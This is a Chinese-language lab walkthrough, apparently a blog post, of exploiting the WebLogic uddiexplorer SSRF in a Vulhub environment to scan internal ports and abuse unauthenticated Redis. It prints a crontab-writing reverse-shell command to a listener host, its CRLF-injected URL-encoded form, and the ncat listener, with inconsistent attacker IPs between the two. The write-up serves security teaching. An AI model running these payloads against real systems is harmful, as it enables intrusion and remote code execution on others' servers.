【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell

目录

  • 1 Weblogic中的SSRF漏洞概述
  • 2 WebLogic 架构介绍
    • 2.1 简介
    • 2.2 优势
    • 2.3 服务功能
  • 3 Redis 组件介绍
    • 3.1 简介
    • 3.2 功能
      • 3.2.1 功能概述
      • 3.2.2 数据功能
      • 3.2.3 主从同步功能
  • 4 fastcgi 组件介绍
    • 4.1 CGI
    • 4.2 fastcgi
  • 5 SSRF 攻击案例
    • 5.1 实验目的
    • 5.2 实验环境
    • 5.3 实验前准备
    • 5.4 实验过程
      • 5.4.1 阶段一:SSRF漏洞挖掘
      • 5.4.2 阶段二:SSRF漏洞利用到挖掘未授权访问漏洞
      • 5.4.3 阶段三:从未授权访问到GetShell
  • 7 总结
  • 参考文章

1 Weblogic中的SSRF漏洞概述

概述:Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。redis存在未授权访问漏洞(在访问redis数据库时,无需提供用户名及密码,且具备root权限读写文件)。

影响范围:版本10.0.2、版本10.3.6。

2 WebLogic 架构介绍

2.1 简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

2.2 优势

WebLogic Server具有开发和部署关键任务电子商务Web应用系统所需的多种特色和优势,包括:

(1)标准
对业内多种标准的全面支持,包括EJB、JSP、JMS、JDBC、XML(标准通用标记语言的子集)和WML,使Web应用系统的实施更为简单,并且保护了投资,同时也使基于标准的解决方案的开发更加简便。

(2)可扩展性
WebLogic Server 以其高扩展的架构体系闻名于业内,包括客户机连接的共享、资源pooling以及动态网页和EJB组件群集。

(3)快速开发
凭借对EJB和JSP的支持,以及WebLogic Server 的Servlet组件架 构体系,可加速投放市场速度。这些开放性标准与WebGain Studio配合时,可简化开发,并可发挥已有的技能,迅速部署应用系统。

(4)更趋灵活
WebLogic Server的特点是与领先数据库、操作系统和Web服务器紧密集成。

(5)可靠性
其容错、系统管理和安全性能已经在全球数以千计的关键任务环境中得以验证。

(6)体系结构
WebLogic Server是专门为企业电子商务应用系统开发的。企业电子商务应用系统需要快速开发,并要求服务器端组件具有良好的灵活性和安全性,同时还要支持关键任务所必需的扩展、性能、和高可用性。WebLogic Server简化了可移植及可扩展的应用系统的开发,并为其它应用 系统和系统提供了丰富的互操作性。

2.3 服务功能

(1)在使用IP地址的一台计算机,或在使用集群捆绑在一起的多台计算机上,或在通过代理服务器管理的多台计算机上建立拥有相同域名的不同站点。
(2)部署基于J2EE 标准编写的服务器JAVA代码,包括servlet,JSP,JavaBean 和EJB。
(3)使用J2EE 扩展网络服务集成分布式系统,包括用于数据库连接的JDBC、用于信息传递的JMS、用于网络目录访问的JNDI、用于分布式事务处理的 JTA 和用于电子邮件处理的JavaMail。
(4)部署使用远程方法调用(RMI)的纯Java 分布式应用程序。
(5)通过使用RMI—IIOP(RMI over Internet Inter-ORB Protocol)协议部署近似CORBA的分布式应用系统。
(6)通过使用安全套接层(SSL)和Weblogic的内在支持为用户验证和授权,实现强大的安全性。
(7)通过将多个Weblogic服务器组成一个集群提供高可用性、负载均衡和容错能力。
(8)利用Java 的多平台能力在Windows NT/2000、Sun Solairs、HP/UX 和其他Weblogic支持的操作系统上部署Weblogic服务器。
(9)在任一平台上,通过使用WebLogic直观的进行基于Web 的管理和监视工具可在网络上轻松管理一个或多个WebLogic服务器。

3 Redis 组件介绍

3.1 简介

Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。

3.2 功能

3.2.1 功能概述

Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户端,使用很方便。

Redis 是一个开源(BSD 许可)的内存数据结构存储,用作数据库、缓存和消息代理。 Redis 提供数据结构,例如字符串、哈希、列表、集合、具有范围查询的排序集合、位图、超日志、地理空间索引和流。 Redis 具有内置复制、Lua 脚本、LRU 驱逐、事务和不同级别的磁盘持久性,并通过 Redis Sentinel 和 Redis Cluster 自动分区提供高可用性。

3.2.2 数据功能

数据类型多样。redis和Memcached类似,它支持存储的value类型相对更多,包括以下类型:

  • string(字符串)
  • list(链表)
  • set(集合)
  • zset(sorted set --有序集合)
  • hash(哈希类型)

数据操作方法
以上数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。

数据存储
与memcached一样,redis为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。

3.2.3 主从同步功能

Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。这使得Redis可执行单层树复制。

存盘可以有意无意的对数据进行写操作。由于完全实现了发布/订阅机制,使得从数据库在任何地方同步树时,可订阅一个频道并接收主服务器完整的消息发布记录。
同步对读取操作的可扩展性和数据冗余很有帮助。

4 fastcgi 组件介绍

4.1 CGI

定义:CGI(Common Gateway Interface),即通用网关接口,是 WWW(World Wide Web)技术中最重要的技术之一,是外部应用程序(即 CGI 程序)与 Web 服务器之间的接口标准,负责在 CGI 程序和 Web 服务器之间传递信息

功能:CGI 是 Web 服务器运行时,调用外部应用程序(即 CGI 程序)的规范,CGI 规范允许 Web 服务器执行外部程序,并将它们的输出发送给 Web 浏览器,CGI 将 Web 的一组简单的静态超媒体文档变成一个完整的、新的交互式媒体,按照 CGI 编写的程序可以扩展 Web 服务器功能。

4.2 fastcgi

FastCGI 实际上是增加了一些扩展功能的 CGI 、是 CGI 的改进,描述了客户端和Web服务器程序之间传输数据的一种标准。

FastCGI 致力于减少Web服务器与CGI程序之间进行互动的开销,从而使Web服务器可以同时处理更多的Web请求。与 CGI 为每个Web请求创建一个新的进程不同, FastCGI 使用持续的进程来处理一连串的Web请求,这些进程由FastCGI进程管理器管理,而不是Web服务器。

5 SSRF 攻击案例

5.1 实验目的

(1)理解SSRF攻击原理;
(2)掌握SSRF攻击的方法。

5.2 实验环境

靶机:CentOS中的Vulhub靶场。在虚拟机安装CentOS系统,可以参考文章《第1节 CentOS7虚拟机安装》;搭建Vulhub靶场环境,可参考文章《【环境搭建-04】CentOS上搭建Vulhub靶场》。

攻击者:CentOS及真实机。靶机与攻击机处于同一局域网。

5.3 实验前准备

(1)打开安装有Vulhub的虚拟机,使用命令ip addr查询靶机IP地址为192.168.1.8。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第1张图片
(2)使用命令cd /usr/vulhub/weblogic/ssrf进入Vulhub安装目录下的目录weblogic/ssrf进行实验。
在这里插入图片描述
(3)输入docker-compose up -d启动docker镜像。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第2张图片
(4)使用命令docker ps -a,查看启动了多少个容器,内容显示如下。可以看到总共有2个容器,分别是weblogic、redis。
在这里插入图片描述

[root@centos-1 ssrf]# docker ps -a
CONTAINER ID        IMAGE                           COMMAND                  CREATED             STATUS              PORTS                              NAMES
7da81e63403d        vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"       14 hours ago        Up 14 hours         5556/tcp, 0.0.0.0:7001->7001/tcp   ssrf_weblogic_1
0c73a42e208a        vulhub/baselinux:centos-6       "/docker-entrypoin..."   14 hours ago        Up 14 hours         6379/tcp                           ssrf_redis_1

(5)使用命令docker exec -it 0c73a42e208a "/bin/bash"登录镜像,其中0c73a42e208a为所要登录镜像的id。即打开docker环境中的基础linux系统,其中it后面的一串数字是baselinux对应的ID。可以看到成功进入该docker容器,在此容器内查看到的数据文件是docker内的文件。
在这里插入图片描述

[root@centos-1 ssrf]# docker exec -it 0c73a42e208a "/bin/bash"
[root@0c73a42e208a /]#

(6)使用命令uname -a查看系统版本信息,可以看到回显出系统版本和时间等。
在这里插入图片描述

[root@0c73a42e208a /]# uname -a
Linux 0c73a42e208a 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

(7)查看计划任务文件crontab。在etc下有一个计划任务文件crontab,首先cd /etc进入etx目录,然后使用命令ls -al /etc/crontab,查询该文件的权限,可以看到root用户可读可写,其他用户仅可读。使用命令cat /etc/crontab读取计划任务文件,查看计划任务格式。
在这里插入图片描述

[root@0c73a42e208a etc]# ls -al /etc/crontab
-rw-r--r--. 1 root root 457 Sep 27  2011 /etc/crontab

【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第3张图片

(8)使用命令cp /etc/crontab /etc/crontab.bak,将该crontab文件备份,因为待会实验需要修改该文件。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第4张图片
(9)使用命令ip addr查询容器内系统的IP地址为172.19.0.2。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第5张图片
(10)使用exit命令退出docker容器。
在这里插入图片描述

[root@95c1bca022c9 /]# exit
exit
[root@192 ssrf]# 

5.4 实验过程

5.4.1 阶段一:SSRF漏洞挖掘

(1)真实机打开自带的浏览器,访问192.168.1.8:7001,这是weblogic的一个管理端口。页面访问如下,说明weblogic已启动。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第6张图片

(2)访问weblogic漏洞存在的地方。真实机浏览器输入192.168.1.8:7001/uddiexplorer/访问weblogic的管理主站,这是漏洞存在的位置。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第7张图片
(3)点击“Search Public Registries”进入该网页,将浏览器设置为代理模式。具体可参考《【Burp Suite工具-2】BurpSuite工作原理及菜单栏介绍》
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第8张图片

(4)真实机打开BurpSuite,进入proxy代理模块,将BurpSuite的代理拦截功能打开,再返回浏览器,点击“Search”。BurpSuite的应用具体可参考《【Burp Suite工具-2】BurpSuite工作原理及菜单栏介绍》
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第9张图片
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第10张图片

(5)切换到BurpSuite代理界面,可以看到其拦截的请求,右键将其发送到Repeater模块。在该请求中,下图 所指的是请求中要传入的URL,只是一些冒号和斜杆等特殊符号被编码看起来不怎么直观而已。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第11张图片

(6)切换到repeater模块,将刚刚的请求发送,在响应窗口点击Render,将响应采用页面显示的方式展示,可以看到响应页面如下。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第12张图片
(7)将该请求体中的URL参数修改为http://www.baidu.com,并点击发送,可以看到响应页面如下,与上面的响应有所不同。也就是说,页面产生了不同的状态,由此结合布尔盲注的思想,可以利用这种显示的差异来作一些判断,也就是说此处存在SSRF漏洞。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第13张图片

5.4.2 阶段二:SSRF漏洞利用到挖掘未授权访问漏洞

(1)进行端口的探测。将该请求体中的URL参数修改为http://localhost:7001,并点击发送,可以看到响应页面如下,收到该端口的一个404响应,也就是说该端口是开启着的。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第14张图片

(2)探测内网IP。(回顾一下NAT相关知识)下一步可以根据该处的响应,来盲测其所在内网的IP地址。

  • 此时我们先测试一下靶机所配置的IP地址,将该请求体中的URL参数修改为http://192.168.1.1:7001,并点击发送,响应页面显示找到对应IP地址但是无法连接。将该请求体中的URL参数修改为http://192.168.1.20:7001,并点击发送,响应页面显示没有找到对应IP地址。
    【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第15张图片
    【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第16张图片

  • 由于docker环境的网段一般是172.*,也就是说可能的内网IP地址还可以是172.16.0.1~172.31.255.255,对于无从下手的时候可以采用BurpSuite来爆破。此时我们就不显示爆破过程,在前文我们已经查询得知docker容器系统IP地址为172.19.0.2,此处将该请求体中的URL参数修改为http://172.19.0.2:7001,并点击发送,可以看到响应与localhost:7001一致,由此可以猜测该IP就是网站所在的内网IP。同理,在真实网络中就也可以测试其他内网IP。
    【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第17张图片

  • 此处将该请求体中的URL参数修改为http://172.19.0.2:6379,并点击发送,可以看到也成功收到响应,说明端口开启(6379为redis数据库的端口)。也就是说我们根据服务端的响应可以扫描内网IP和端口的状态,知道了此处有个redis,可能存在未授权访问。后续将利用该未授权访问权限来写入文件以GetShell。
    【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第18张图片

5.4.3 阶段三:从未授权访问到GetShell

(1)攻击者打开CentOS(身份其实是攻击者)虚拟机,开启特定端口以接收反弹的shell文件。

  • 打开终端,输入命令ncat -lvvp 777开启777端口监听。
    在这里插入图片描述

(2)利用redis数据库读写文件的语法。利用redis未授权访问漏洞,目的是反弹shell到CentOS本地终端中。利用redis数据库读写文件的语法解释如下:

  • 第一句含义是在任意时间以root将bash弹到后面这个IP的地址端口,需要接收端开启对应端口才能接收到。
  • 第二句是设置目录,crontab这个文件在/etc/下
  • 第三局是选择文件
  • 第四句是将信息保存到对应目录的对应文件中。
#利用redis数据库读写文件的语法。
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.1.8/777 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

(3)利用BurpSuite或其他编码工具对上述语句进行URL编码,如下:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.6%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

(4)将上述代码添加到repeater模块中请求体中链接http://172.19.0.2:6379/后面,点击sent。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第19张图片

(5)按教程就是等待终端中反弹出docker的shell,反弹后如下所示,进入了WebLogic的redis数据库中,并输入whoami查看当前用户。
【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==>Redis(存在未授权访问)==>GetShell_第20张图片

7 总结

(1)掌握SSRF漏洞挖掘的方法;
(2)掌握利用SSRF漏洞进行内网扫描;
(3)本实验中未涉及SSRF利用时绕过的方法;
(4)后续将研究如何成功反弹shell。

参考文章

[1] 《weblogic百度百科》
[2] 《Redis百度百科》
[3] 《Redis官网》
[4] 《CGI介绍》
[5] 《FastCGI介绍》
[6] 《/etc/crontab文件和crontab -e命令区别》

你可能感兴趣的:(#,入门07,Web安全之渗透测试,WEB安全,SSRF,WeblogicSSRF漏洞)